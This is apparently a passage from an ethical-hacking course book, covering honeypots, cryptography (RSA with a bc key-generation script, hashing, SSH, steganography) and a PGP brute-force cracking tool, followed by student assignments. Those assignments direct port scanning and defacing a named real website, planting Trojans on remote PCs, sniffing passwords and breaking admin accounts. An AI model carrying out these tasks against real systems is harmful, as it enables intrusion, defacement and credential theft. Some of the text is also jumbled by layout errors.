Like any technology, honeypots also have their weaknesses. It is because of this they
do not replace any current technology, but work with existing technologies.
1. Limited view: Honeypots can only track and capture activity that directly
interacts with them. Honeypots will not capture attacks against other systems,
unless the attacker or threat interacts with the honeypots also.
2. Risk: All security technologies have risk. Firewalls have risk of being penetrated,
encryption has the risk of being broken, and IDS sensors have the risk of failing
to detect attacks. Honeypots are no different, they have risk also. Specifically,
honeypots have the risk of being taken over by the bad guy and being used to
harm other systems. This risks various for different honeypots. Depending on the
type of honeypot, it can have no more risk then an IDS sensor, while some
honeypots have a great deal of risk. We identify which honeypots have what
levels of risk later in the paper.
10.9.3 Types Of Honeypots
Honeypots come in many shapes and sizes, making them difficult to get a grasp of. To
help us better understand honeypots and all the different types, we break them down
into two general categories, low-interaction and high-interaction honeypots.
These categories help us understand what type of honeypot you are dealing with, its
strengths, and weaknesses. Interaction defines the level of activity a honeypot allows an
attacker.
10.9.4 Low-Interaction Honeypots
Low-interaction honeypots have
services and operating systems.
the honeypot. For example, an
emulate a FTP login, or it may
limited interaction; they normally work by emulating
Attacker activity is limited to the level of emulation by
emulated FTP service listening on port 21 may just
support a variety of additional FTP commands. The
_______________________________________________________________________________________
advantages of a low-interaction honeypot are their simplicity. These honeypots tend to
be easier to deploy and maintain, with minimal risk. Usually they involve installing
software, selecting the operating systems and services you want to emulate and
monitor, and letting the honeypot go from there. This plug and play approach makes
deploying them very easy for most organizations. Also, the emulated services mitigate
risk by containing the attacker's activity, the attacker never has access to an operating
system to attack or harm others. The main disadvantages with low interaction honeypots
is that they log only limited information and are designed to capture known activity. The
emulated services can only do so much. Also, its easier for an attacker to detect a lowinteraction honeypot, no matter how good the emulation is, skilled attacker can
eventually detect their presence. Examples of low-interaction honeypots include
Specter, Honeyd, and KFSensor.
10.9.5 High-Interaction Honeypots
High-interaction honeypots are different; they are usually complex solutions as they
involve real operating systems and applications. Nothing is emulated; we give attackers
the real thing. If you want a Linux honeypot running an FTP server, you build a real
Linux system running a real FTP server. The advantages with such a solution are two
fold. First, you can capture extensive amounts of information. By giving attackers real
systems to interact with, you can learn the full extent of their behavior, everything from
new rootkits to international IRC sessions. The second advantage is high-interaction
honeypots make no assumptions on how an attacker will behave. Instead, they provide
an open environment that captures all activity. This allows high-interaction solutions to
learn behavior we would not expect. An excellent example of this is how a Honeynet
captured encoded back door commands on a non-standard IP protocol (specifically IP
protocol 11, Network Voice Protocol). However, this also increases the risk of the
honeypot as attackers can use this real operating system to attack non-honeypot
systems. As result, additional technologies have to be implement that prevent the
attacker from harming other non-honeypot systems. In general, high-interaction
honeypots can do everything low-interaction honeypots can do and much more.
However, they can be more complext to deploy and maintain. Examples of highinteraction honeypots include Symantec Decoy Server and Honeynets. You can find a
complete listing of both low and high interaction honeypots at Honeypot Solutions page.
To better understand both low and high interaction honeypots lets look at two examples.
We will start with the low-interaction honeypot Honeyd.
Systems, as any data you retrieve from a honeypot is most likely related to the attacker.
The value honeypots provide here is quickly giving organizations the in-depth
information they need to rapidly and effectively respond to an incident. In general, highinteraction honeypots make the best solution for response. To respond to an intruder,
you need in-depth knowledge on what they did, how they broke in, and the tools they
_______________________________________________________________________________________
used. For that type of data you most likely need the capabilities of a high-interaction
honeypot.
10.9.6 Honeypot Software Vendors
1. Back Officer Friendly (http://www.nfr.com)
2. Bait N Switch Honeypot (http://violating.us)
3. BigEye (http://violating.us)
4. HoneyD(http://www.citi.umich.edu/u/provos/honeyd/)
5. KFSensor for Windows (http://www.keyfocus.net/kfsensor/)
6. LaBrea Tarpit (http://www.hackbusters.net)
7. ManTrap (http://www.symantec.com)
8. NetFacade (http://www.itsecure.bbn.com/NetFacade.htm)
9. Single-Honeypot (http://www.sourceforge.net/projects/singlehoneypot/)
10. Smoke Detector
11. (http://palisadesys.com/products/smokedetector/)
12. Specter (http://www.specter.ch)
13. Tiny Honeypot (http://www.alpinista.org/thp/)
14. The Deception Toolkit (http://www.all.net/dtk/)
10.9.7 Honeypot-KFSensor
KFSensor is a Windows based honeypot Intrusion Detection System (IDS).
It acts as a honeypot to attract and detect hackers and worms by simulating vulnerable
system services and Trojans.
By acting as a decoy server it can divert attacks from critical systems and provide a
higher level of information than can be achieved by using firewalls and NIDS alone.
KFSensor is designed for use in a Windows based corporate environment and contains
many innovative and unique features such as remote management, a Snort compatible
signature engine and emulations of Windows networking protocols.
With its GUI based management console, extensive documentation and low
maintenance, KFSensor provides a cost effective way of improving an organization's
network security.
Signature attack identification
KFSensor's rule base signature engine can identify known attack patterns, which greatly
helps in analyzing the nature of a event. Rules can be imported from external sources in
Snort format giving access to a huge amount of security knowledge.
_______________________________________________________________________________________
Detects Windows networking attacks
KFSensor contains the world's only Windows networking/ NetBIOS / SMB / CIFS
emulation honeypot. This unique feature enables it to detect the nature of attacks on file
shares and Windows administrative services, currently the most prevalent and
damaging on the Internet.
Firewalls can detect port scans, but not the nature of an attack. NIDS can identify
certain attacks but not without the risk of compromising security. Only KFSensor can
provide the maximum information on an attack, without risk of compromise.
Extendable architecture
The already comprehensive emulation and reporting features of KFSensor can be
further extended by writing your own scripts and database queries.
No false positives
Firewalls and network based IDS are often overwhelmed by the amount of network
traffic and often generate false alarms by misinterpreting legitimate network traffic.
KFSensor's honeypot model has no legitimate uses, so all connections to them are
suspect.
Low overheads
KFSensor lies dormant until attacked, consuming very little processor time or network
resources. Sensors can be installed on users’ machines without affecting their normal
use, eliminating the need for additional hardware.
Full coverage
All TCP, UDP and ICMP traffic is monitored for all ports.
Remote Administration
Protect different locations in the corporate network with multiple KFSensor installations
and manage the process from one location. KFSensor Enterprise Edition provides
remote configuration and real time concatenation of events from a single administrator
machine using top of the range encryption and authentication.
Simplicity
The concepts behind KFSensor are easy to understand. Its configuration and operation
is straightforward, requiring minimal training and maintenance.
_______________________________________________________________________________________
Advanced server simulation
KFSensor emulates real servers, such as FTP, SMB, POP3, HTTP, Telnet, SMTP and
SOCKS to improve deception and gain more valuable information on a hacker's
motives.
Real time detection
Attacks are detected, analyzed and reported immediately allowing response to an attack
while still in progress.
Detects unknown threats
Unlike other products KFSensor does not rely on signatures of known attacks and can
therefore detect new or 0 day threats, such as new worms, viruses and elite hackers.
KFSensor is just as effective at detecting internal threats.
Security in-depth
KFSensor complements other types of security products, such as firewalls, anti-virus
and network based IDS systems, to provide an additional layer of protection.
Designed for a corporate environment
KFSensor's secure design and its ability to work both inside a LAN and in front of a
firewall make it suitable for organizations that demand the highest security
requirements.
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-11
Cryptography with different
applications
Session Objectives:
Introduction to Cryptography
What Is PKI?
RSA (Rivest Shamir Adleman)
Setting up RSA
MD5
SHA (Secure Hash Algorithm)
What Is SSH?
Hacking Tool: PGP Crack
Steganography
Tool: Mp3stego
_______________________________________________________________________________________
Introduction____________________________________
Cryptography comes from the Greek words for ''secret writing.'' It has a long and
colorful history going back thousands of years. In this section we will just sketch some of
the highlights, as background information for what follows. For a complete history of
cryptography, Kahn's (1995) book is recommended reading. For a comprehensive
treatment of the current state-of-the-art in security and cryptographic algorithms,
protocols, and applications, see (Kaufman et al., 2002). For a more mathematical
approach, see (Stinson, 2002). For a less mathematical approach, see (Burnett and
Paine, 2001).
Professionals make a distinction between ciphers and codes. A cipher is a character-forcharacter or bit-for-bit transformation, without regard to the linguistic structure of the
message. In contrast, a code replaces one word with another word or symbol. Codes
are not used any more, although they have a glorious history. The most successful code
ever devised was used by the U.S. armed forces during World War II in the Pacific.
They simply had Navajo Indians talking to each other using specific Navajo words for
military terms, for example chay-dagahi-nail-tsaidi (literally: tortoise killer) for antitank
weapon. The Navajo language is highly tonal, exceedingly complex, and has no written
form. And not a single person in Japan knew anything about it.
In September 1945, the San Diego Union described the code by saying ''For three
years, wherever the Marines landed, the Japanese got an earful of strange gurgling
noises interspersed with other sounds resembling the call of a Tibetan monk and the
sound of a hot water bottle being emptied.'' The Japanese never broke the code and
many Navajo code talkers were awarded high military honors for extraordinary service
and bravery. The fact that the U.S. broke the Japanese code but the Japanese never
broke the Navajo code played a crucial role in the American victories in the Pacific.
11.1 Introduction to Cryptography_________________
Historically, four groups of people have used and contributed to the art of cryptography:
the military, the diplomatic corps, diarists, and lovers. Of these, the military has had the
most important role and has shaped the field over the centuries. Within military
organizations, the messages to be encrypted have traditionally been given to poorlypaid, low-level code clerks for encryption and transmission. The sheer volume of
messages prevented this work from being done by a few elite specialists.
Until the advent of computers, one of the main constraints on cryptography had been
the ability of the code clerk to perform the necessary transformations, often on a
battlefield with little equipment. An additional constraint has been the difficulty in
switching over quickly from one cryptographic method to another one, since this entails
retraining a large number of people. However, the danger of a code clerk being captured
_______________________________________________________________________________________
by the enemy has made it essential to be able to change the cryptographic method
instantly if need be.
11.2 Types of Cryptography_______________________
Symmetric-key cryptography
Asymmetric cryptography
11.2.1 Symmetric-key cryptography
Symmetric-key cryptography refers to encryption methods in which both the sender and
receiver share the same key (or, less commonly, in which their keys are different, but
related in an easily computable way).
The modern study of symmetric-key ciphers relates mainly to the study of block ciphers
and stream ciphers and to their applications. A block cipher is, in a sense, a modern
embodiment of Alberti's polyalphabetic cipher: block ciphers take as input a block of
plaintext and a key, and output a block of cipher text of the same size. Since messages
are almost always longer than a single block, some method of knitting together
successive blocks is required. Several have been developed, some with better security
in one aspect or another than others. They are the mode of operations and must be
carefully considered when using a block cipher in a cryptosystem.
11.2.2 Asymmetric-key cryptography
Asymmetric cryptography, also known as Public-key cryptography, is a form of
cryptography in which the key used to encrypt a message differs from the key used to
decrypt it. In public key cryptography, a user has a pair of cryptographic keys—a public
key and a private key. The private key is kept secret, while the public key may be widely
distributed. Incoming messages would have been encrypted with the recipient's public
key and can only be decrypted with his corresponding private key. The keys are related
mathematically, but the private key cannot be practically derived from the public key.
The two main branches of public key cryptography are:
Public key encryption — a message encrypted with a recipient's public key cannot be
decrypted by anyone except the recipient possessing the corresponding private key.
This is used to ensure confidentiality.
Digital signatures — a message signed with a sender's private key can be verified by
anyone who has access to the sender's public key, thereby proving that the sender
signed it and that the message has not been tampered with. This is used to ensure
authenticity.
_______________________________________________________________________________________
Conversely, secret key cryptography, also known as symmetric cryptography uses a
single secret key for both encryption and decryption. To use symmetric cryptography for
communication, both the sender & receiver would have to know the key beforehand, or
it would have to be sent along with the message. Clearly public-key cryptography is
more suitable for communication.
11.2.2.1 What is PKI?
PKI - Public-key Cryptography Technology
Public-key cryptography was invented in 1976 by Whitfield Diffie and Martin Hellman.
The Certificate Authority process operates on certificate server software. It needs to
communicate with one or more LDAP repositories. The certificates are used by
certificate aware web servers and web browsers. They can also be used in certificate
aware email and applications.
Few applications, beyond the Web browser, are currently certificate aware. But notable
exceptions are emerging: Oracle8 enables certificate based authentication to its broad
client/server base and several products, including People soft, will be able to use
certificates through the GSS-API with Tuxedo. Most of us operate in heterogeneous
environments with servers and browsers from a variety of vendors. So understanding
key, PKI standards helps in mapping integration of components into a certificates
support fabric.
PKI Standards
The figure below maps the major standards that glue together components of a PKI.
Most of them deal with ways information about certificates is encoded and shuttled
around. These links are important when you start considering plug-and-play services for
your PKI and may help alert you to products that may have a proprietary hook in a key
pinion of the architecture. There are other standards that define the make up of
certificates themselves, negotiation of algorithms during various handshakes, etc. They
do not appear in the diagram.
PKI Policy
PKI policy exists within the general security policy environment of an organization.
Digital certificates need a well established environment of good general security policy
and procedure before they can be effective. The start of a PKI project is an excellent
time to review your organization's overall policy and procedure framework. Are your
policies up to date, comprehensive, well communicated? Are your security staffs
knowledgeable about the security policies and in the habit of consulting and maintaining
their procedure documentation? Have you informed users of their security
responsibilities? A culture that understands the role of policy in security will have an
easier time implementing a PKI and digital certificates.
_______________________________________________________________________________________
Figure: 11.1 Working of Encryption
Figure: 11.2 Digital Signature
_______________________________________________________________________________________
11.2.2.1 What is Digital Signature?
Digital signature scheme is a type of asymmetric cryptography used to simulate the
security properties of a handwritten signature on paper. Digital signature schemes
normally give two algorithms, one for signing which involves the user's secret or private
key, and one for verifying signatures which involves the user's public key. The output of
the signature process is called the "digital signature."
A signature provides authentication of a "message". Messages may be anything, from
electronic mail to a contract, or even a message sent in a more complicated
cryptographic protocol. Digital signatures are used to create public key infrastructure
(PKI) schemes in which a user's public key (whether for public-key encryption, digital
signatures, or any other purpose) is tied to a user by a digital identity certificate issued
by a certificate authority. PKI schemes attempt to unbreakably bind user information
(name, address, phone number, etc.) to a public key, so that public keys can be used as
a form of identification.
Digital signatures are often used to implement electronic signatures, a broader term that
refers to any electronic data that carries the intent of a signature, but not all electronic
signatures use digital signatures. In some countries, including the United States, and in
the European Union, electronic signatures have legal significance. However, laws
concerning electronic signatures do not always make clear their applicability towards
cryptographic digital signatures, leaving their legal importance somewhat unspecified.
11.3 RSA (Rivest Shamir Adleman)_________________
Named after its inventors, Ron Rivest, Adi Shamir and Leonard Adleman, RSA
encryption transforms the number "char" into the number "cipher" with the formula
cipher = charê (mod n)
The numbers e and n are the two numbers you create and publish. They are your
"public key." The number char can be simply the digital value of a block of ASCII
characters. The formula says: multiply the number char by itself e times, then divide the
result by the number n and save only the remainder. The remainder that we have called
cipher is the encrypted representation of char.
_______________________________________________________________________________________
Example of RSA algorithm
Figure: 11.3
RSA Attacks
1.
2.
3.
4.
5.
6.
Brute forcing RSA factoring
Esoteric attack
Chosen cipher text attack
Low encryption exponent attack
Error analysis
Other attacks
The GNU Bc Compiler
Our test program for calculating RSA keys, rsakeys. Bc, is written for Philip A. Nelson's
threaded code compiler, named Bc. A program written for Bc is well suited to this
experimental work, because it can handle numbers of arbitrary size.
_______________________________________________________________________________________
11.3.1 Setting up RSA
To set up RSA encryption, the main thing you need is a table of prime numbers. Begin
by selecting two prime numbers at random. When the rsakeys.bc program asks for p
and q, give it the two primes you selected. Of course, any numbers can be used for
practice. Primes, especially large primes, make it more difficult for an eavesdropper to
decrypt your message.
Call the program with the command bc rsakeys.bc. After you enter the numbers p and q,
the program asks for a random number to be used to start a search for keys. When the
program finds a pair of keys, it prints out results and pauses for keyboard input. Enter a
negative number to quit. Or, if you don't like the key pair offered, enter any positive
number to continue the search for another pair of keys. The value that you enter, to
continue or to stop, doesn't matter; only its sign is checked.
The search finds two numbers, e and d, such that their product, modulo the number (p1)*(q-1), is 1. In other words, the numbers e and d are such that their product minus 1,
e*d - 1, is an integer multiple of the number (p-1)*(q-1).
Example Key Search
Using small numbers for clarity, here are results of an example run:
Enter prime p: 47
Enter prime q: 71
n = p*q = 3337
(p-1)*(q-1) = 3220
Guess a large value for public key e then we can work down from there.
Enter trial public key e: 79
Trying e = 79
Use private key d:
1019
Publish e:
79
and n:
3337
cipher = charê (mod n) char = cipher^d (mod n)
_______________________________________________________________________________________
Enter any positive value to continue search for next e
The output above was created by the following Bc program.
# rsakeys.bc: generate RSA keys
# these Bc routines are transliterations of
# the C routines found in Bruce Schneier's
# "Applied Crytography" Wiley, New York. 1994.
# ISBN 0-471-59756-2
# modexp: from page 200
define modexp(a, x, n) { # return a ^ x mod n
auto r
r=1
while ( x > 0 ) {
if ( (x % 2) == 1 ) {
r = (r * a) % n
}
a=(a*a)%n
x /= 2
}
return(r)
}
# extended Euclidean algorithm
# adapted from C
define exteuclid(u, v) {
auto q, tn
u1 = 1
u3 = u
v1 = 0
_______________________________________________________________________________________
v3 = v
while ( v3 > 0 ) {
q = u3 / v3
tn = u1 - v1 * q
u1 = v1
v1 = tn
tn = u3 - v3 * q
u3 = v3
v3 = tn
}
u1out = u1
u2out = ( u3 - u1 * u ) / v
return(u3)
}
print "enter prime p: "; p = read()
print "enter prime q: "; q = read()
n=p*q
phi = (p-1) * (q-1)
print " n = p*q = ", n
print "\n(p-1)*(q-1) = ", phi
print "\n Guess a large value for public key e "
print "\n then we can work down from there."
print "\n enter trial public key e: "; e = read()
while ( e > 0 ) {
print "\ntrying e = ",e
gcd = exteuclid(e,phi)
d = u1out
_______________________________________________________________________________________
if ( gcd == 1 ) {
nextgcd = exteuclid(u1out,phi)
# print "nextgcd = ",nextgcd
if ( u1out == e ) {
# print "\nthat one works "
print "\n\nUse private key d:\n",d
print "\n\n Publish e:\n",e,"\n and n:\n",n
print "\ncipher = charê (mod n)"
print " char = cipher^d (mod n)"
print "\nenter any positive value"
print " to continue search for next e "
go = read()
if (go < 0) { break }
}
}
e=e-2
}
print "\n"
halt
11.4 MD5_______________________________________
The MD5 algorithm takes as input a message of arbitrary length and produces as output
a 128-bit "fingerprint" or "message digest" digest of the input. The MD5 algorithm is
intended for digital signature applications, where a large file must be "compressed" in a
secure manner before being encrypted with a private (secret) key under a public-key
cryptosystem such as RSA.
The largest deployment of systems that depend upon this ability to authenticate their
users is by far the password contingent. Unfortunately, telnet is about the height of
password exchange technology at most sites, and even most Web sites don’t use the
MD5 (Message Digest) standard to exchange passwords.
_______________________________________________________________________________________
It could be worse; passwords to every company could be printed in the classified section
of the New York Times. That’s a comforting thought. “If our firewall goes, every device
around here is owned. But, at least my passwords aren’t in the New York Times.”
11.5 SHA (Secure Hash Algorithm)_________________
The SHA algorithm takes as input a message of arbitrary length and produces as output
a 160-bit “fingerprint" or "message digest" of the input. The algorithm is slightly slower
than MD5, but the larger message digest makes it more secret against brute-force
collision and inversion attacks.
SSL (Secure Socket Layer)
The Secure Sockets Layer (SSL) is a commonly-used protocol for managing the
security of a message transmission on the Internet. SSL has recently been succeeded
by Transport Layer Security (TLS), which is based on SSL. SSL uses a program layer
located between the Internet's Hypertext Transfer Protocol (HTTP) and Transport
Control Protocol (TCP) layers. SSL is included as part of both the Microsoft and
Netscape browsers and most Web server products. Developed by Netscape, SSL also
gained the support of Microsoft and other Internet client/server developers as well and
became the de facto standard until evolving into Transport Layer Security. The "sockets"
part of the term refers to the sockets method of passing data back and forth between a
client and a server program in a network or between program layers in the same
computer. SSL uses the public-and-private key encryption system from RSA, which also
includes the use of a digital certificate.
RC5
1. RC5 is a fast block cipher designed by RSA Security in 1994.
2. It is a parameterized algorithm with a variable block size, a variable key size and
a variable number of rounds. The key size is 128 bit.
3. RC6 is a block cipher based on RC5. Like RC5, RC6 is a parameterized
algorithm where the block size, the key size and the number of rounds are
variable again. The upper limit on the key size is 2040 bits.
11.5.1 What is SSH?
Secure Shell (SSH), sometimes known as Secure Socket Shell, is a Unix-based
command interface and protocol for securely getting access to a remote computer. It is
widely used by network administrators to control Web and other kinds of servers
remotely. SSH is actually a suite of three utilities - slogin, ssh, and scp - that are secure
versions of the earlier UNIX utilities, rlogin, rsh, and rcp. SSH commands are encrypted
and secure in several ways. Both ends of the client/server connection are authenticated
using a digital certificate, and passwords are protected by being encrypted. SSH uses
_______________________________________________________________________________________
RSA public key cryptography for both connection and authentication. Encryption
algorithms include Blowfish, DES, and IDEA. IDEA is the default.
SSH2, the latest version, is a proposed set of standards from the Internet Engineering
Task Force (IETF). SSH2 is a more secure, efficient and portable version of SSH that
includes SFTP, an SSH2 tunneled FTP.
PGP (Pretty Good Privacy)
1. Pretty Good Privacy (PGP) is a software package originally developed by Philip R
Zimmermann that provides cryptographic routines for emails and file storage
applications.
2. Zimmermann took existing cryptosystems and cryptographic protocols and
developed a program that can run on multiple platforms. It provides message
encryption, digital signatures, data compression and email compatibility.
Figure: 11.4
11.5.2 Hacking Tool: PGP Crack
http://munitions.iglu.cjb.net/dolphin.cgi?action=render&category=0406
1. PGP crack is a program designed to brute-force a conventionally encrypted file
with PGP or a PGP secret key.
2. The file "pgpfile" must not be ascii-armored. The file “phraselist” should be a file
containing all of the pass phrases that will be used to attempt to crack the
encrypted file.
_______________________________________________________________________________________
11.6 Tool: WonderCrypt__________________________
WonderCrypt is a solution for secure information exchange and storage.
Figure: 11.5
Information Exchange (Mail & File) Security:
Privacy: Protect your message from being read by un-authorised recipients.
Integrity: Ensure that the recipient receives exactly what you have sent i.e. message
has not been changed by any interceptor.
Identity and Authentication: Authenticate the message with your Identity to create
Trust with the recipient.
Security of User Identity (Private Key): You can remove your User Identity (Private
Key) from the hard disk and keep it safe on a removable media such as floppy, cd or zip
drive, thus you can carry your User Identity with you and Sign-In even on a public
terminal that has WonderCrypt installed.To secure or read your mails it will not be
necessary to copy your User Identity on this public terminal."To store your User Identity
on an access protected USB Token purchase Herald version, that comes with a USB
Token, from http://www.wondercrypt.com."
Information Storage Security:
File and Folder Encryption: Encrypt selected files or all files in a folder in one click.
Secure delete: Delete files from your computer in a way that makes the file 100% unrecoverable.
_______________________________________________________________________________________
Self-Decrypting File:
Convenient utility: Secure a file with an out of band shared password so that only the
intended recipient can access the contents, even if the recipient does not have this
software.
Security of your personal data:
Security of some of your private data: You can store some private data on Key Token
and carry on your key chain. "To use this feature purchase Herald version, that comes
with a USB Token, from http://www.wondercrypt.com."
WonderCrypt uses public key infrastructure (PKI) to achieve the messaging security
features as described above. PKI establishes a secure method of exchanging
information on a public insecure network like the Internet. It includes the use of
cryptographic methods, digital signatures, certificates, and certificate authorities.
Public key infrastructure’s basic components from an end user’s perspective are
keys:
Your User Identity (Private Key): Used to sign a document and also to decrypt mail or
files encrypted using your public key. A new private key is created when you create your
User Identity. This key you never share.
Your Public Identity (Public Key): Used by others to verify your signature and also to
encrypt mail or files that only you can decrypt. Your public key also gets created
automatically when you create your User Identity. This key should be known to public
hence you distribute it freely so that others can verify a mail or file signed by you and
also encrypt mail or file that they send to you. Only you can read mail or file encrypted
using your public key.
The Options of Contacts and Key Management:
Creating a New User Identity creates a new Private Key (PKI Key Pair that
includes matching Public Key). Alternatively, you can create a New User Identity
that uses an existing Private Key that is in your browser, by exporting it from the
browser, and then importing it during New User Sign-Up.
Change user password (Private Key Password).
Create CSR (Certificate Signing Request)
Add a Certificate Authority by importing Certificate Authority Public Key.
Add a Contact by importing Other’s Public Key.
Export your own Public Key to a file so that you can send it to others.
Delete Contacts from your contact list by deleting the contact's public key.
Run CRL (Certificate Revocation List)
Post your public identity (public key file) on an LDAP (Directory) server.
Download a contact's public identity (public key file) from an LDAP server.
_______________________________________________________________________________________
Figure: 11.6
Figure: 11.7
_______________________________________________________________________________________
The utility features include:
Mail Signing
Mail Encryption
File Signing
File Encryption
Folder Encryption
Self-decrypting file
Secure Delete
Desktop Security: File and Folder Encryption
My Passwords.
User Identity storage on Key Token
11.7 Steganography_____________________________
The process of hiding data in images is called Steganography. The most popular
method for hiding data in files is to utilize graphic images as hiding place.
Attackers can embed information such as:
1. Source code for hacking tool
2. List of compromised servers
3. Plans for future attacks
4. Your grandma/s secret cookie recipe
_______________________________________________________________________________________
11.7.1 Tool: S-tool
S-Tool is a steganography program that can hide loads of text in images. Simple encrypt
and decrypt of data even after adding bytes of data, there is no increase in image size.
Image looks the same to normal paint packages. Loads and saves to files and gets past
all the mail sniffers.
Figure: 11.8
_______________________________________________________________________________________
11.7.2 Tool: Mp3Stego
MP3Stego will hide information in MP3 files during the compression process.
The data is first compressed, encrypted and then hidden in the MP3 bit stream.
Figure: 11.9
11.8 Steganography Detection_____________________
1. Stegdetect is an automated tool for detecting steganographic content in
images.
2. It is capable of detecting different steganographic methods to embed
hidden information in JPEG images.
3. Stegbreak is used to launch dictionary attacks against Jsteg-Shell, JPHide and
OutGuess 0.13b.
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Assignment-1
Assignment-1
Dear Student, please note that Assignment-1 is compulsory and you’ll have to
submit any one from Assignment 2 or 3 also.
Exercise: 1
Do port scanning on the website http//: www.anupgirdhar.net and try to find out
open ports and services running on those ports. Try to connect to the open ports.
Description: Use some scanning (port scanner) tools and with the help of Internet find
out various services running on various ports.
Time Duration: 3 hrs
Exercise: 2
Suppose you have received a forged mail from someone, try to trace the path
through which the mail came and all the IPs.
Description: Use some e-mail tracing tools to get the whole path and IP.
Time duration: 3 hrs.
Exercise: 3.
Try to hack the web site http://www.anupgirdhar.net and collect the maximum
information as you can.
Description: try the utilities and the dos commands to fetch the information about the
anupgirdhar.net and then try to hack the site by the different types of attack system on it.
The target is to add your name as contents on the front page of the web site
Time Duration: 4 hrs.
All Rights Reserved, www.sedulitygroups.com
_______________________________________________________________________________________
Assignment-2
Assignment-2
Exercise: 1
Write a program to use en-cryptography techniques so that user feed some
strings that can be converted into encrypted format. And then decrypt the data
also.
Description: by using the c language write a program so that user accept the data from
the user and by using any algorithm convert the data in encrypted format and after that
convert the encrypted data into decrypted format also
Let the algorithm will be
e.g. for encryption
Ch=ch+3
e.g. for decryption
ch=ch-3
Exercise: 2
Use Reverse Engineering techniques to edit a file and try to crack it.
Description: Use any Reverse Engineering tools and open the file in it to edit and crack
it. You can use hex workshop or Resource Hacker or any one you like.
_______________________________________________________________________________________
Exercise: 3
Use Sniffers to analyze network traffic and try to get some password files.
Description: Use some network analyzing tools (sniffers)
Time duration 4 hrs
Exercise: 4
Try to install the Trojans on the remote computer without knowing the username
and password of that computer, by scanning the open/close ports on that PC.
Submit the document of all your job action taken.
Description: To install a Trojan on remote PC first try to scan that particular PC
Try to install the Trojans on the remote computer on the network & after that scan PC
again for the open ports. Fetch the data from that particular PC without knowing the
username & password. Create documentation for this case study.
_______________________________________________________________________________________
Assignment-3
Assignment-3
Exercise: 1
Try to break into the administrator account and recover passwords of all the
users’ account, when you are given a restricted account.
Description: Try to rename or change SAM file to get in to administrative rights or use
dictionary or brute force attacks to get administrative passwords.
Exercise: 2
There is a file on one of the system in LAN, try to download it on your system.
After downloading it on your system analyzes it, & find out the hidden content in
the file & try to extract the hidden content.
Description: Copy the file containing hidden data from LAN & try to extract the hidden
content using staganographic (ex. S-tool) tools.
Time duration: 2hrs.
Exercise: 3
There are some excel sheets which are password protected and these sheets are
again zipped which is also password protected. Try to break & extract the file &
break the password.
Description: Use some Advance Office Password Recovery tool and Advance Zip
Password Recovery tool to crack passwords.
_______________________________________________________________________________________
Exercise: 4
What is Cryptography? Explain in details different types of cryptography with
examples. Explain in detail RSA algorithm.
_______________________________________________________________________________________
Reader’s Response
Name of Book: _________________________________________________________
Batch: ______________________________
Date: ______________________
The members of the Design Team at SEDULITY SOLUTIONS & TECHNOLOGIES,
New Delhi, are always striving to enhance the quality of the books produced by them.
As a reader, your suggestions and feedback are very important to us. They are of
tremendous help to us in continually improving the quality of this book. Please rate this
book in terms of the following aspects.
Aspects
Rating
Presentation Style Suggestion
Excellent
Good
Poor
Simplicity of language
Excellent
Good
Poor
Topics chosen Suggestion
Excellent
Good
Poor
Topic Coverage Suggestion
Excellent
Good
Poor
Explanation Provided
Excellent
Good
Poor
Excellent
Good
Poor
Suggestion
Quality of Picture/ Diagrams
Suggestion
Overall Suggestion_______________________________________________________
______________________________________________________________________
______________________________________________________________________
______________________________________________________________________
Please fill up this response card and send it to the Design Head, Sedulity Solutions &
Technologies, New Delhi. Your efforts in this direction will be most appreciated.
[email protected]
_______________________________________________________________________________________

Basics of Networking

Transcription

Similar documents

Clik here to open the Sterkinekor Moviestop: Membership Card Guide

DVU Log-in Credentials

Security Awareness Hackers Auditors Perspective public

Teacher Pages

4. Select the “My Lexile Range” drop down. Now, click search. 2

North Olmsted City Schools Outlook Web App This is the WEBMAIL

New to Neat Repeatz? Get Started in 2 Easy Steps!

Laxmi Khattri [email protected]

Security Password Form

VOITTAVA KYBERSTRATEGIA Jarno Limnéll